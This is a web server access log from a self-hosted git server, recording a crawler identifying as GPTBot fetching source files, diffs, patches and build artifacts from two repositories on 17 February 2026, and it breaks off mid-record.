"/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" [Client 74.7.227.38] [Length 10601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" +[17/Feb/2026:13:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13142] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services" +[17/Feb/2026:13:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d.diff" [Client 74.7.227.38] [Length 160] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.patch" [Client 74.7.227.38] [Length 58749428] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1752073] [Gzip 24.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c.diff" [Client 74.7.227.38] [Length 524367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12938] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" +[17/Feb/2026:13:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" +[17/Feb/2026:13:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" +[17/Feb/2026:13:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea.diff" [Client 74.7.227.38] [Length 1832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 12997] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:13:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81787] [Gzip 50.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" +[17/Feb/2026:13:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14646] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" +[17/Feb/2026:13:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 14860] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 14175] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" [Client 74.7.227.38] [Length 10573] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.diff" [Client 74.7.227.38] [Length 451614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15615] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 14936] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" +[17/Feb/2026:13:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" +[17/Feb/2026:13:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14562] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" +[17/Feb/2026:13:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" +[17/Feb/2026:13:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 7497] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 10253] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 7487] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 15077] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 7489] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 7487] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 14809] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15542] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16467] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14192] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" +[17/Feb/2026:13:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 17033] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" [Client 74.7.227.38] [Length 9833] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" +[17/Feb/2026:13:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 12602] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" +[17/Feb/2026:13:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 11839] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" +[17/Feb/2026:13:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:13:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" +[17/Feb/2026:13:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" +[17/Feb/2026:13:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 